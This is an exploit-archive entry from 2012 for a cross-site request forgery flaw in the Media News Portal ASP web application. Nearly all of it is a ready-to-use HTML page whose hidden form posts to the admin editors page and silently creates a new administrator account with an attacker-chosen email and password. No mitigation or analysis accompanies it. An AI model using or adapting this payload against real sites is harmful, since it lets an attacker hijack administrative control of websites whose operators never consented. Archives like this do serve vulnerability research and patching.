id: 18252
date: 05/13/2012
title: Media News Portal CSRF Vulnerability (Add Admin)
author: AtT4CKxT3rR0r1ST
cves: 

Media News Portal CSRF Vulnerability (Add Admin)
====================================================================
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.gazatem.com/Products/medianewsportal.asp
####################################################################
===[ Exploit ]===
<html>
<head>
<title>Media News Portal [Add Admin]</title>
</head>
<H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localhost/admin/editors.asp">
<input type="hidden" name="editorName" value="Admin"/>
<input type="hidden" name="editorEmail" value="f.hack@w.cn"/>
<input type="hidden" name="psw1" value="123456"/>
<input type="hidden" name="psw2" value="123456"/>
<input type="hidden" name="passLevel" value="1"/>
<input type="hidden" name="func" value="Add User"/>
</form>
</body>
</html>
####################################################################



#  0day.today [2023-03-25]  #